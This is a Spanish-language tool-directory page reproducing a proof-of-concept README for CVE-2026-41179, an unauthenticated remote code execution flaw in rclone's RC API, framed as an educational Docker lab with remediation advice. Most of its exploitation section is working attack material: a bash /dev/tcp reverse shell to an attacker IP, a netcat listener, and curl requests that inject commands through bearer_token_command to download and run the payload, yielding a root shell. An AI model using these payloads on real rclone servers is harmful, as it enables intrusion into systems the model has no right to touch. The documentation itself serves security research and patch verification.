Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41179 — Prueba de concepto para CVE-2026-41179 | Kitploit
Herramientas/GitHubGitHub/pssec-io/cve-2026-41179
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

Prueba de concepto para CVE-2026-41179

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41179 — Ejecución Remota de Código sin Autenticación en la API RC de rclone

⚠️ SOLO CON FINES EDUCATIVOS Este repositorio está destinado estrictamente a la investigación de seguridad, la educación y entornos de laboratorio autorizados. PSSec y los contribuyentes de este repositorio no aprueban, apoyan ni asumen ninguna responsabilidad por cualquier uso no autorizado, ilegal o malicioso de la información, el código o las técnicas aquí contenidas. Al utilizar este repositorio, usted acepta que es el único responsable de sus acciones y que solo realizará pruebas en sistemas que posea o para los que tenga permiso explícito por escrito.


Resumen

CVE-2026-41179 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) sin autenticación en la API de Control Remoto (RC) integrada de rclone, que afecta a las versiones 1.48.0 hasta 1.73.4.

DetalleValor
CVECVE-2026-41179
Puntuación CVSS9.8 (Crítica)
Versiones afectadasrclone 1.48.0 – 1.73.4
Versión parcheadarclone 1.73.5
ComponenteAPI RC (endpoint /operations/fsinfo)
Vector de ataqueRed — no se requiere autenticación

Cómo funciona

rclone incluye una interfaz de control remoto HTTP integrada (rcd). El endpoint /operations/fsinfo acepta una cadena fs= proporcionada por el usuario que se analiza y se utiliza para instanciar un backend, incluido el backend WebDAV. El backend WebDAV admite un parámetro bearer_token_command, que se pasa directamente a exec.Command() sin sanitización. Debido a que no se requiere autenticación en este endpoint de forma predeterminada, un atacante no autenticado puede desencadenar la ejecución arbitraria de comandos del sistema operativo como el usuario del proceso rclone.

Cadena de ataque en resumen:

root@kitploit:~
POST /operations/fsinfo (sin autenticación)
  → rc.GetFs() analiza la cadena fs= controlada por el atacante
    → Backend WebDAV instanciado con parámetros del atacante
      → Se extrae bearer_token_command
        → exec.Command() ejecuta el comando del sistema operativo
          → RCE como usuario del proceso rclone

Estructura del repositorio

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Imagen vulnerable de rclone (v1.69.3)
├── patched.Dockerfile.rclone  # Imagen parcheada de rclone (v1.73.5)
├── poc.sh                     # Payload de reverse shell
└── instructions               # Guía paso a paso del laboratorio

Configuración del laboratorio y explotación (paso a paso)

Requisitos previos

  • Docker
  • Un listener: penelope o netcat
  • Python 3 (para servir el payload)

Paso 1 — Construir la imagen vulnerable de Docker

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

Construye un contenedor Debian-slim que ejecuta rclone v1.69.3 con la API RC expuesta en el puerto 5572.


Paso 2 — Ejecutar el contenedor vulnerable

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

Ahora la API RC es accesible sin autenticación en http://127.0.0.1:5572.


Paso 3 — Iniciar su listener

root@kitploit:~
penelope -p 5555
# O
nc -lvnp 5555

Paso 4 — Configurar el payload de reverse shell

Edite poc.sh y configure la IP del atacante y el puerto de escucha:

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

Paso 5 — Servir el payload a través de HTTP

Ejecute esto desde el mismo directorio que poc.sh:

root@kitploit:~
python3 -m http.server 8888

Paso 6 — Descargar el payload en el objetivo

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

Paso 7 — Hacer ejecutable el payload

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

Paso 8 — Ejecutar el payload

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

Paso 9 — Obtener la shell

Revise su listener — debería recibir una shell de root del contenedor:

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

Paso 10 — Verificar el parche

Repita los Pasos 1–8 usando la imagen parcheada para confirmar que la vulnerabilidad está corregida:

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

Envíe la misma solicitud curl contra el puerto 5573 — el comando no debería ejecutarse.


Remedio

  • Actualice rclone a v1.73.5 o posterior: la autenticación ahora se aplica en todos los endpoints RC de forma predeterminada.
  • Si no puede actualizar de inmediato, inicie rcd con las banderas --rc-user y --rc-pass para requerir credenciales.
  • Restrinja el acceso de red al puerto RC (5572) mediante reglas de firewall; nunca debería estar expuesto a redes no confiables.
  • Considere usar --rc-no-auth=false (el nuevo valor predeterminado en versiones parcheadas) explícitamente en los scripts de inicio.

Descargo de responsabilidad

Este repositorio se proporciona únicamente con fines educativos y de investigación de seguridad autorizada. El código de prueba de concepto demuestra una vulnerabilidad real en un entorno de laboratorio Docker controlado.

PSSec y todos los contribuyentes:

  • No autorizan ni alientan la explotación de sistemas sin permiso explícito por escrito del propietario del sistema.
  • No asumen ninguna responsabilidad por cualquier daño, pérdida de datos, consecuencias legales o uso indebido derivado del uso de este material.
  • Recomiendan que todas las pruebas se realicen solo en entornos de laboratorio aislados que usted posea o para los que tenga autorización explícita para realizar pruebas.

El uso no autorizado de este código contra sistemas de producción o sistemas que no posea puede violar las leyes de fraude informático y delitos cibernéticos en su jurisdicción.


CVE-2026-41179 — Investigación por PSSec

Descargar herramienta